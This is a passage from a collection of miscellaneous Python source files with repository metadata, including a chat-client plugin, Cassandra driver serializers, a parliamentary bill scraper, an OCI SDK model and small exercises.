obj3.showData()\n\n","repo_name":"soudomsinh/Python","sub_path":"Python-OOP/Constructor&Destructor.py","file_name":"Constructor&Destructor.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74348170724","text":"# -*- coding: utf-8 -*-\n\nimport gtk\nimport gobject\n\nimport Plugin\nimport desktop\nfrom emesenelib.common import escape\nfrom emesenelib.common import unescape\nfrom Parser import PangoDataType\n\nERROR = ''\n\nclass MainClass(Plugin.Plugin):\n '''Main plugin class'''\n \n description = _('Notifies various events through messages in your conversation')\n authors = {'Tito': 'tito@webtito.be'}\n website = 'http://perso.webtito.be'\n displayName = _('Inline notifications')\n name = 'InlineNotify'\n \n def __init__(self, controller, msn):\n '''Contructor'''\n Plugin.Plugin.__init__(self, controller, msn, 1000)\n self.controller = controller\n self.description = _('Notifies various events through messages in your conversation')\n self.authors = {'Tito': 'tito@webtito.be'}\n self.website = 'http://perso.webtito.be'\n self.displayName = _('Inline notifications')\n self.name = 'InlineNotify'\n\n self.enabled = False\n self.config = controller.config\n self.config.readPluginConfig(self.name)\n \n self.signals = {}\n self.signals['nick-changed'] = self.nick\n self.signals['contact-status-change'] = self.status\n 
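# note (added): self.status at this point is still the bound method defined below; it is rebound to a dict a few lines down, but the method reference already stored in self.signals keeps working\n        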
self.signals['display-picture-changed'] = self.avatar\n        self.signals['personal-message-changed'] = self.personal\n        self.ids = []\n        \n        self.status = {\n        'NLN' : _('online'),\n        'AWY' : _('away'),\n        'BSY' : _('busy'),\n        'BRB' : _('be right back'),\n        'PHN' : _('on the phone'),\n        'LUN' : _('gone to lunch'),\n        'IDL' : _('idle'),\n        'FLN' : _('offline') }\n    \n    def start(self):\n        self.enabled = True\n        for (key, value) in self.signals.iteritems():\n            self.ids.append(self.msn.connect(key, value))\n    \n    def stop(self):\n        for identifier in self.ids:\n            self.msn.disconnect(identifier)\n        self.ids = []\n        self.enabled = False\n        return True\n    \n    def check(self):\n        return (True, 'Ok')\n    \n    def nick(self, msnp, mail, nick):\n        result = self.controller.conversationManager.getOpenConversation(mail)\n        if result is not None:\n            window, conversation = result\n            alias = self.controller.contacts.get_display_name(mail)\n            if alias != nick: mail = alias\n            text = _('%(mail)s is now called %(nick)s') % {'mail': mail, 'nick': nick}\n            conversation.appendOutputText(None, text, 'information')\n    \n    def status(self, msnp, mail, status):\n        result = self.controller.conversationManager.getOpenConversation(mail)\n        if result is not None:\n            window, conversation = result\n            nick = self.controller.contacts.get_display_name(mail)\n            text = _('%(nick)s is now %(status)s') % {'nick' : nick, 'status' : self.status[status]}\n            conversation.appendOutputText(None, text, 'information')\n    \n    def avatar(self, msnp, p2p, msnobj, mail):\n        result = self.controller.conversationManager.getOpenConversation(mail)\n        if result is not None:\n            window, conversation = result\n            nick = self.controller.contacts.get_display_name(mail)\n            text = _('%s has a new avatar') % nick\n            conversation.appendOutputText(None, text, 'information')\n    \n    def personal(self, msnp, mail, pm):\n        result = self.controller.conversationManager.getOpenConversation(mail)\n        if result is not None:\n            window, conversation = result\n            nick = self.controller.contacts.get_display_name(mail)\n            if pm != '': text = _('%(nick)s has a new personal message : %(message)s') % {'nick' : nick, 'message' : pm}\n            else: text = _('%s doesn\\'t have personal message anymore') % nick\n            conversation.appendOutputText(None, text, 'information')\n","repo_name":"csuarez/emesene-1.6.3-fixed","sub_path":"plugins_base/InlineNotify.py","file_name":"InlineNotify.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"72927570086","text":"#EXERCISES FROM LESSON 6 \n#Eduardo Maciel Sanchez\n\n#45. Compute and display the series 1 – 2/4 + 3/9 – 4/16 + 5/25 + ... + 15/225\n\n#def Ex45():\ndef calcSerie(divMax):\n    resultado = 0\n    i,j = 1,1\n    for n in range(1,16):\n        j = n**2\n        print(i,\" / \",j)\n        resultado += i/j\n        if i < 0:\n            i = (-i)+1\n        else:\n            i = -(i+1)\n    return(resultado)\n\nprint(\"Computes the series 1 – 2/4 + 3/9 – 4/16 + 5/25 + ... 
+ 15/225\")\nserie = calcSerie(225)\nprint(\"A soma é: \",serie)\n \n ","repo_name":"DesolateElf-dev/Algoritmos","sub_path":"Algoritmos/modulo_01/Ex45.py","file_name":"Ex45.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73950384485","text":"import six\n\n\ndef initialize_registry(insights_registry):\n # This will be called from the cluster module, so we put all this behavior\n # in a function to avoid circular imports\n\n if insights_registry.initialized:\n return False\n\n from cassandra import ConsistencyLevel\n from cassandra.cluster import (\n ExecutionProfile, GraphExecutionProfile,\n ProfileManager, ContinuousPagingOptions,\n EXEC_PROFILE_DEFAULT, EXEC_PROFILE_GRAPH_DEFAULT,\n EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT,\n EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT,\n _NOT_SET\n )\n from cassandra.datastax.graph import GraphOptions\n from cassandra.datastax.insights.registry import insights_registry\n from cassandra.datastax.insights.util import namespace\n from cassandra.policies import (\n RoundRobinPolicy,\n DCAwareRoundRobinPolicy,\n TokenAwarePolicy,\n WhiteListRoundRobinPolicy,\n HostFilterPolicy,\n ConstantReconnectionPolicy,\n ExponentialReconnectionPolicy,\n RetryPolicy,\n SpeculativeExecutionPolicy,\n ConstantSpeculativeExecutionPolicy,\n WrapperPolicy\n )\n\n import logging\n\n log = logging.getLogger(__name__)\n\n @insights_registry.register_serializer_for(RoundRobinPolicy)\n def round_robin_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {}}\n\n @insights_registry.register_serializer_for(DCAwareRoundRobinPolicy)\n def dc_aware_round_robin_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'local_dc': policy.local_dc,\n 'used_hosts_per_remote_dc': policy.used_hosts_per_remote_dc}\n }\n\n @insights_registry.register_serializer_for(TokenAwarePolicy)\n def token_aware_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'child_policy': insights_registry.serialize(policy._child_policy,\n policy=True),\n 'shuffle_replicas': policy.shuffle_replicas}\n }\n\n @insights_registry.register_serializer_for(WhiteListRoundRobinPolicy)\n def whitelist_round_robin_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'allowed_hosts': policy._allowed_hosts}\n }\n\n @insights_registry.register_serializer_for(HostFilterPolicy)\n def host_filter_policy_insights_serializer(policy):\n return {\n 'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'child_policy': insights_registry.serialize(policy._child_policy,\n policy=True),\n 'predicate': policy.predicate.__name__}\n }\n\n @insights_registry.register_serializer_for(ConstantReconnectionPolicy)\n def constant_reconnection_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'delay': policy.delay,\n 'max_attempts': policy.max_attempts}\n }\n\n @insights_registry.register_serializer_for(ExponentialReconnectionPolicy)\n def exponential_reconnection_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': 
{'base_delay': policy.base_delay,\n 'max_delay': policy.max_delay,\n 'max_attempts': policy.max_attempts}\n }\n\n @insights_registry.register_serializer_for(RetryPolicy)\n def retry_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {}}\n\n @insights_registry.register_serializer_for(SpeculativeExecutionPolicy)\n def speculative_execution_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {}}\n\n @insights_registry.register_serializer_for(ConstantSpeculativeExecutionPolicy)\n def constant_speculative_execution_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'delay': policy.delay,\n 'max_attempts': policy.max_attempts}\n }\n\n @insights_registry.register_serializer_for(WrapperPolicy)\n def wrapper_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {\n 'child_policy': insights_registry.serialize(policy._child_policy,\n policy=True)\n }}\n\n @insights_registry.register_serializer_for(ExecutionProfile)\n def execution_profile_insights_serializer(profile):\n return {\n 'loadBalancing': insights_registry.serialize(profile.load_balancing_policy,\n policy=True),\n 'retry': insights_registry.serialize(profile.retry_policy,\n policy=True),\n 'readTimeout': profile.request_timeout,\n 'consistency': ConsistencyLevel.value_to_name.get(profile.consistency_level, None),\n 'serialConsistency': ConsistencyLevel.value_to_name.get(profile.serial_consistency_level, None),\n 'continuousPagingOptions': (insights_registry.serialize(profile.continuous_paging_options)\n if (profile.continuous_paging_options is not None and\n profile.continuous_paging_options is not _NOT_SET) else\n None),\n 'speculativeExecution': insights_registry.serialize(profile.speculative_execution_policy),\n 'graphOptions': None\n }\n\n @insights_registry.register_serializer_for(GraphExecutionProfile)\n def graph_execution_profile_insights_serializer(profile):\n rv = insights_registry.serialize(profile, cls=ExecutionProfile)\n rv['graphOptions'] = insights_registry.serialize(profile.graph_options)\n return rv\n\n _EXEC_PROFILE_DEFAULT_KEYS = (EXEC_PROFILE_DEFAULT,\n EXEC_PROFILE_GRAPH_DEFAULT,\n EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT,\n EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT)\n\n @insights_registry.register_serializer_for(ProfileManager)\n def profile_manager_insights_serializer(manager):\n defaults = {\n # Insights's expected default\n 'default': insights_registry.serialize(manager.profiles[EXEC_PROFILE_DEFAULT]),\n # remaining named defaults for driver's defaults, including duplicated default\n 'EXEC_PROFILE_DEFAULT': insights_registry.serialize(manager.profiles[EXEC_PROFILE_DEFAULT]),\n 'EXEC_PROFILE_GRAPH_DEFAULT': insights_registry.serialize(manager.profiles[EXEC_PROFILE_GRAPH_DEFAULT]),\n 'EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT': insights_registry.serialize(\n manager.profiles[EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT]\n ),\n 'EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT': insights_registry.serialize(\n manager.profiles[EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT]\n )\n }\n other = {\n key: insights_registry.serialize(value)\n for key, value in manager.profiles.items()\n if key not in _EXEC_PROFILE_DEFAULT_KEYS\n }\n overlapping_keys = set(defaults) & set(other)\n if overlapping_keys:\n log.debug('The following key names 
overlap default key sentinel keys '\n 'and these non-default EPs will not be displayed in Insights '\n ': {}'.format(list(overlapping_keys)))\n\n other.update(defaults)\n return other\n\n @insights_registry.register_serializer_for(GraphOptions)\n def graph_options_insights_serializer(options):\n rv = {\n 'source': options.graph_source,\n 'language': options.graph_language,\n 'graphProtocol': options.graph_protocol\n }\n updates = {k: v.decode('utf-8') for k, v in six.iteritems(rv)\n if isinstance(v, six.binary_type)}\n rv.update(updates)\n return rv\n\n @insights_registry.register_serializer_for(ContinuousPagingOptions)\n def continuous_paging_options_insights_serializer(paging_options):\n return {\n 'page_unit': paging_options.page_unit,\n 'max_pages': paging_options.max_pages,\n 'max_pages_per_second': paging_options.max_pages_per_second,\n 'max_queue_size': paging_options.max_queue_size\n }\n\n insights_registry.initialized = True\n return True\n","repo_name":"datastax/python-driver","sub_path":"cassandra/datastax/insights/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","stars":1354,"dataset":"github-code","pt":"52"} +{"seq_id":"21136280950","text":"import re\n\nfrom aviva_pensions.parsers.text_parser_interface import TextParserInterface\n\nclass RisksParser(TextParserInterface):\n\n def __init__(self, names:list[str]) -> None:\n super().__init__()\n\n self._risk_names = names\n\n def get_name(self) -> str:\n return 'risks'\n\n def get_values(self, text: str) -> dict:\n\n values = {}\n\n for name in self._risk_names:\n result = re.search(\"{}Yes\".format(name), text)\n if result != None:\n values[name] = 'Yes'\n else:\n values[name] = 'No'\n\n return values\n","repo_name":"timothy-r/pension-fund-report","sub_path":"aviva_pensions/parsers/risks_parser.py","file_name":"risks_parser.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23785640424","text":"import time\r\n\r\nimport environment.graph as graph\r\n\r\nif __name__ == '__main__':\r\n\r\n print('Creating environment data')\r\n start = time.time()\r\n\r\n # Define graph\r\n nodes = 10; weigths = 2; density = 0.5\r\n\r\n # Generate adjacency matrix and the cost matrix from random graph\r\n adj, cost = graph.rand(nodes, weigths, density)\r\n\r\n print(f\"ADJACENCY MATRIX \\n{adj}\"),\r\n\r\n print(f\"COST MATRIX \\n{cost}\")\r\n\r\n finish = time.time() - start\r\n print('Running time {} sec'.format(finish))\r\n\r\n graph.plot(adj)\r\n","repo_name":"ramonlins/kserver","sub_path":"test_generate_graph.py","file_name":"test_generate_graph.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1010494494","text":"import numpy as np\nfrom yutility import ensure_list\nfrom collections.abc import Iterable\n\n\nclass Grid:\n '''\n Class that defines positions and values on a grid.\n '''\n def __init__(self, spacing: Iterable[float] or float = None, \n origin: Iterable[float] or float = None, \n ndims: int = None):\n if ndims is None:\n # check if we can get the number of dimensions from spacing or origin\n if spacing:\n ndims = len(ensure_list(spacing))\n elif origin:\n ndims = len(ensure_list(origin))\n # if not, we default to a 3D grid\n else:\n ndims = 3\n\n self.ndims = ndims\n\n self.spacing = np.array(ensure_list(spacing or [1] * ndims))\n 
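# note (added): a scalar spacing is broadcast to every dimension below when its length does not match ndims\n        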
self.origin = np.array(ensure_list(origin or [0] * ndims))\n if len(self.spacing) != ndims:\n self.spacing = np.array([self.spacing[0]] * ndims)\n\n self.sub_grids = []\n\n # arithmetic and logic\n def __add__(self, other):\n return self.__and__(other)\n\n def __and__(self, other):\n if isinstance(other, Grid):\n self.sub_grids.append((other, '+'))\n return self\n\n def __sub__(self, other):\n return self.__or__(other)\n\n def __or__(self, other):\n if isinstance(other, Grid):\n self.sub_grids.append((other, '-'))\n return self\n\n # necessary functions\n def set_points(self, parent=None):\n self._points = None\n self.incorporate_sub_grid()\n\n def incorporate_sub_grid(self):\n for sub_grid, sign in self.sub_grids:\n if self._points is None:\n self._points = sub_grid.points(self)\n continue\n\n if sign == '+':\n unique_indices = np.invert((sub_grid.points(self) == self._points[:,None]).all(2).any(0))\n self._points = np.append(self._points, sub_grid.points(self)[unique_indices], axis=0)\n\n if sign == '-':\n unique_indices = np.invert((self._points == sub_grid.points(self)[:,None]).all(2).any(0))\n self._points = self._points[unique_indices]\n\n duplicate_indices = (sub_grid.points(self) == self._points[:,None]).all(2).any(0)\n self._points = np.append(self._points, sub_grid.points(self)[duplicate_indices], axis=0)\n\n # if self._points is None:\n # self._points = np.array([])\n\n # return self._points\n\n\n def points(self, parent=None):\n if not hasattr(self, '_points'):\n self.set_points(parent=parent)\n return self._points\n\n\nclass Cube(Grid):\n ### grid additive methods\n def __init__(self, origin: Iterable[float] or float = None, \n extent: Iterable[float] or float = None,\n spacing: Iterable[float] or float = None, \n *args, **kwargs):\n '''\n Add points in a cube to the Grid.\n \n Args:\n origin: The origin of the cube to be added.\n extent: The distance the cube goes from the origin. For example, for a 2D box, the extent would be (width, height).\n '''\n super().__init__(spacing, origin, *args, **kwargs)\n self.extent = ensure_list(extent)\n\n def set_points(self, parent=None):\n if parent:\n origin = self.origin - parent.origin\n spacing = parent.spacing\n else:\n origin = self.origin\n spacing = self.spacing\n\n assert len(origin) == self.ndims\n assert len(self.extent) == self.ndims\n\n # first build the axes\n # for a cube, the axes are linearly spaced starting in the origin and ending in origin + extent. 
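(note, added: np.arange excludes the stop value, so origin + extent itself is not sampled)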
\n # The number of points along each axis is given by self.spacing\n axes = []\n for dim in range(self.ndims):\n axis = np.arange(0, self.extent[dim], spacing[dim])\n axis = axis + origin[dim]\n axes.append(axis.round(10))\n\n # after getting all axes we create a meshgrid\n meshed_axes = np.meshgrid(*axes)\n meshed_axes = [axis.flatten() for axis in meshed_axes]\n # flattening and stacking gives our points\n self._points = np.vstack(meshed_axes).T\n # self.incorporate_sub_grid()\n self.values = np.zeros(len(self._points))\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n main_grid = Grid(1, ndims=2)\n cube = Cube((0, 0), (10, 10))\n cube2 = Cube((-10, -10), (30, 30))\n\n main_grid = main_grid + cube - cube2\n print(main_grid.sub_grids)\n plt.scatter(*main_grid.points().T)\n plt.show()\n","repo_name":"YHordijk/yutility","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"8132140203","text":"import os\n\nclass MemClass():\n \"\"\" Class to get the total memory usage, free memory, buffered and\n cached memory. \"\"\"\n\n #\n # Class constructor\n #\n def __init__(self):\n pass\n\n #\n # String representation\n #\n def __str__(self):\n return ' '.join(self.__mem_current())\n\n #\n # Get memory usage\n #\n def __mem_current(self):\n # Open proc file\n with open('/proc/meminfo') as fd:\n meminfo = fd.read().split()\n fd.close()\n\n # Remove uninteresting items from list\n del meminfo[3 - 1::3]\n mem = []\n\n # Return the two things we're interested in\n for key in range(len(meminfo)):\n if \"MemTotal\" in meminfo[key]:\n mem.append(meminfo[key + 1])\n if \"MemFree\" in meminfo[key]:\n mem.append(meminfo[key + 1])\n\n return mem\n\n #\n # Collector trigger\n #\n def get_stats(self):\n return self.__mem_current()\n \n","repo_name":"krihal/sysinfo","sub_path":"adapters/mem.py","file_name":"mem.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73086071524","text":"from selenium import webdriver\nimport chromedriver_binary \nimport time\nimport datetime\nimport requests \nimport hashlib\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--disable-gpu\")\n\ndef get_timestamp(date):\n timestamp_now = time.mktime(datetime.datetime.strptime(date, \"%d/%m/%Y\").timetuple())\n\n return timestamp_now\n\n\n\ndef get_info_all_propositions(type):\n logging.info(f\"Function get_info_all_propositions. 
Proposition inserted: {type}\")\n\n    driver = webdriver.Chrome(chrome_options=options)\n    num_page = 1\n    all_timestamp = []\n    all_link = []\n    all_propositions = []\n\n    today = datetime.date.today()\n    time_now = get_timestamp(today.strftime(\"%d/%m/%Y\"))\n    three_days_ago = time_now-(72*60*60)\n\n    condition = 0\n\n    while True:\n        url = f'''https://www.camara.leg.br/busca-portal?contextoBusca=BuscaProposicoes&pagina={num_page}&order=data&abaEspecifica=true&filtros=%5B%7B\"ano\"%3A\"2021\"%7D%5D&tipos={type}'''\n        driver.get(url)\n\n        # get all dates\n        all_dates = driver.find_elements_by_xpath(\"//p[@class='busca-resultados__info']\")\n\n        # keep only results from the last three days (72 hours)\n        for date in all_dates:\n            d = (date.text.split('\\n')[1].split(\" \")[0])\n            timestamp = get_timestamp(d)\n            if timestamp>=three_days_ago:\n                all_timestamp.append(timestamp)\n            else:\n                logging.info(\"Date is more than three days old\")\n                condition = 1\n                break\n\n        # get all proposition\n        all_propositions = driver.find_elements_by_xpath(\"//h6//a\")\n\n        # get link proposition\n        for a in all_propositions:\n            link = driver.find_element_by_link_text(a.text)\n            all_link.append(link.get_attribute(\"href\"))\n\n        if condition == 1: \n            break\n        num_page+=1\n    return [all_timestamp,all_propositions,all_link]\n\ndef get_pdf_proposition(link_proposition):\n    logging.info(\"Function get_pdf_proposition\")\n\n    driver = webdriver.Chrome(chrome_options=options)\n    hashes = []\n\n    for proposition in link_proposition:\n        driver.get(f'''{proposition}''')\n\n        it_link = driver.find_element_by_link_text(\"Inteiro teor\")\n        link = it_link.get_attribute(\"href\")\n        download_pdf(link)\n        hashes.append(pdf_to_hash())\n    return hashes\n\n\ndef download_pdf(url):\n    logging.info(\"Function download_pdf\")\n\n    filename = url.split('filename=')[1] \n    r = requests.get(url, stream=True)\n    with open('metadata.pdf', 'wb') as fd: \n        for chunk in r.iter_content(2000): \n            fd.write(chunk)\n    return url.split('filename=')[1]\n\ndef pdf_to_hash():\n    logging.info(\"Function pdf_to_hash\")\n\n    file = \"metadata.pdf\"\n    BLOCK_SIZE = 65536\n\n    file_hash = hashlib.md5()\n    with open(file, 'rb') as f:\n        fb = f.read(BLOCK_SIZE)\n        while len(fb) > 0:\n            file_hash.update(fb) \n            fb = f.read(BLOCK_SIZE)\n    return file_hash.hexdigest()\n\n\ndef run(type):\n    logging.info(\"Function: Run\")\n    datas_type = get_info_all_propositions(type)\n    list_hash = get_pdf_proposition(datas_type[2])\n\n    return list_hash\n    \n    \nif __name__ == '__main__':\n    # PUT TYPE PROPOSITION -> ['PL','PEC','PLP']\n    logging.info(\"START APP\")\n    list_hash = run('PL')\n    logging.info(f\"LIST: {list_hash}\")\n    \n\n\n","repo_name":"douglasnotfunny/scrap_camara","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31600197849","text":"from .host_configuration_metric_group import HostConfigurationMetricGroup\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel  # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass HostMemoryConfiguration(HostConfigurationMetricGroup):\n    \"\"\"\n    Memory Configuration metric for the host\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Initializes a new HostMemoryConfiguration object with values from keyword arguments. 
The default value of the :py:attr:`~oci.opsi.models.HostMemoryConfiguration.metric_name` attribute\n of this class is ``HOST_MEMORY_CONFIGURATION`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param metric_name:\n The value to assign to the metric_name property of this HostMemoryConfiguration.\n Allowed values for this property are: \"HOST_PRODUCT\", \"HOST_RESOURCE_ALLOCATION\", \"HOST_MEMORY_CONFIGURATION\", \"HOST_HARDWARE_CONFIGURATION\", \"HOST_CPU_HARDWARE_CONFIGURATION\", \"HOST_NETWORK_CONFIGURATION\", \"HOST_ENTITES\", \"HOST_FILESYSTEM_CONFIGURATION\"\n :type metric_name: str\n\n :param time_collected:\n The value to assign to the time_collected property of this HostMemoryConfiguration.\n :type time_collected: datetime\n\n :param page_size_in_kb:\n The value to assign to the page_size_in_kb property of this HostMemoryConfiguration.\n :type page_size_in_kb: float\n\n :param page_tables_in_kb:\n The value to assign to the page_tables_in_kb property of this HostMemoryConfiguration.\n :type page_tables_in_kb: float\n\n :param swap_total_in_kb:\n The value to assign to the swap_total_in_kb property of this HostMemoryConfiguration.\n :type swap_total_in_kb: float\n\n :param huge_page_size_in_kb:\n The value to assign to the huge_page_size_in_kb property of this HostMemoryConfiguration.\n :type huge_page_size_in_kb: float\n\n :param huge_pages_total:\n The value to assign to the huge_pages_total property of this HostMemoryConfiguration.\n :type huge_pages_total: int\n\n \"\"\"\n self.swagger_types = {\n 'metric_name': 'str',\n 'time_collected': 'datetime',\n 'page_size_in_kb': 'float',\n 'page_tables_in_kb': 'float',\n 'swap_total_in_kb': 'float',\n 'huge_page_size_in_kb': 'float',\n 'huge_pages_total': 'int'\n }\n\n self.attribute_map = {\n 'metric_name': 'metricName',\n 'time_collected': 'timeCollected',\n 'page_size_in_kb': 'pageSizeInKB',\n 'page_tables_in_kb': 'pageTablesInKB',\n 'swap_total_in_kb': 'swapTotalInKB',\n 'huge_page_size_in_kb': 'hugePageSizeInKB',\n 'huge_pages_total': 'hugePagesTotal'\n }\n\n self._metric_name = None\n self._time_collected = None\n self._page_size_in_kb = None\n self._page_tables_in_kb = None\n self._swap_total_in_kb = None\n self._huge_page_size_in_kb = None\n self._huge_pages_total = None\n self._metric_name = 'HOST_MEMORY_CONFIGURATION'\n\n @property\n def page_size_in_kb(self):\n \"\"\"\n Gets the page_size_in_kb of this HostMemoryConfiguration.\n Page size in kilobytes\n\n\n :return: The page_size_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._page_size_in_kb\n\n @page_size_in_kb.setter\n def page_size_in_kb(self, page_size_in_kb):\n \"\"\"\n Sets the page_size_in_kb of this HostMemoryConfiguration.\n Page size in kilobytes\n\n\n :param page_size_in_kb: The page_size_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._page_size_in_kb = page_size_in_kb\n\n @property\n def page_tables_in_kb(self):\n \"\"\"\n Gets the page_tables_in_kb of this HostMemoryConfiguration.\n Amount of memory used for page tables in kilobytes\n\n\n :return: The page_tables_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._page_tables_in_kb\n\n @page_tables_in_kb.setter\n def page_tables_in_kb(self, page_tables_in_kb):\n \"\"\"\n Sets the page_tables_in_kb of this HostMemoryConfiguration.\n Amount of memory used for page tables in kilobytes\n\n\n :param page_tables_in_kb: The page_tables_in_kb of this 
HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._page_tables_in_kb = page_tables_in_kb\n\n @property\n def swap_total_in_kb(self):\n \"\"\"\n Gets the swap_total_in_kb of this HostMemoryConfiguration.\n Amount of total swap space in kilobytes\n\n\n :return: The swap_total_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._swap_total_in_kb\n\n @swap_total_in_kb.setter\n def swap_total_in_kb(self, swap_total_in_kb):\n \"\"\"\n Sets the swap_total_in_kb of this HostMemoryConfiguration.\n Amount of total swap space in kilobytes\n\n\n :param swap_total_in_kb: The swap_total_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._swap_total_in_kb = swap_total_in_kb\n\n @property\n def huge_page_size_in_kb(self):\n \"\"\"\n Gets the huge_page_size_in_kb of this HostMemoryConfiguration.\n Size of huge pages in kilobytes\n\n\n :return: The huge_page_size_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._huge_page_size_in_kb\n\n @huge_page_size_in_kb.setter\n def huge_page_size_in_kb(self, huge_page_size_in_kb):\n \"\"\"\n Sets the huge_page_size_in_kb of this HostMemoryConfiguration.\n Size of huge pages in kilobytes\n\n\n :param huge_page_size_in_kb: The huge_page_size_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._huge_page_size_in_kb = huge_page_size_in_kb\n\n @property\n def huge_pages_total(self):\n \"\"\"\n Gets the huge_pages_total of this HostMemoryConfiguration.\n Total number of huge pages\n\n\n :return: The huge_pages_total of this HostMemoryConfiguration.\n :rtype: int\n \"\"\"\n return self._huge_pages_total\n\n @huge_pages_total.setter\n def huge_pages_total(self, huge_pages_total):\n \"\"\"\n Sets the huge_pages_total of this HostMemoryConfiguration.\n Total number of huge pages\n\n\n :param huge_pages_total: The huge_pages_total of this HostMemoryConfiguration.\n :type: int\n \"\"\"\n self._huge_pages_total = huge_pages_total\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/opsi/models/host_memory_configuration.py","file_name":"host_memory_configuration.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"20343925130","text":"import sys\nsys.path.append('./')\nimport torch\nfrom torch import nn\nimport torch.optim as optim\nimport torch.utils.data as utils\nfrom torch.utils.data import DataLoader, Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_swiss_roll\nimport matplotlib.pyplot as plt\n\nimport model as model\n\n\n\n\n\n\ninput_size = 3 # img_size = (28,28) ---> 28*28=784 in total\nhidden_size = 32 # number of nodes at hidden layer\nnum_classes = 2 # number of output classes discrete range [0,9]\nnum_epochs = 30 # number of times which the entire dataset is passed throughout the model\nlr = 1e-3 # size of step\n\n\nbatch_size = 128\n\n\nx_train, manifold_x_train = make_swiss_roll(n_samples=10000)\nx_train = x_train.astype(np.float32)\ny_train = (x_train[:, 0:1] >= 10).astype(np.float32)\nfrom sklearn.preprocessing import OneHotEncoder\nonehot_encoder = OneHotEncoder(sparse=False)\nabc = onehot_encoder.fit(y_train)\ntrain_set = utils.TensorDataset(torch.FloatTensor(x_train), 
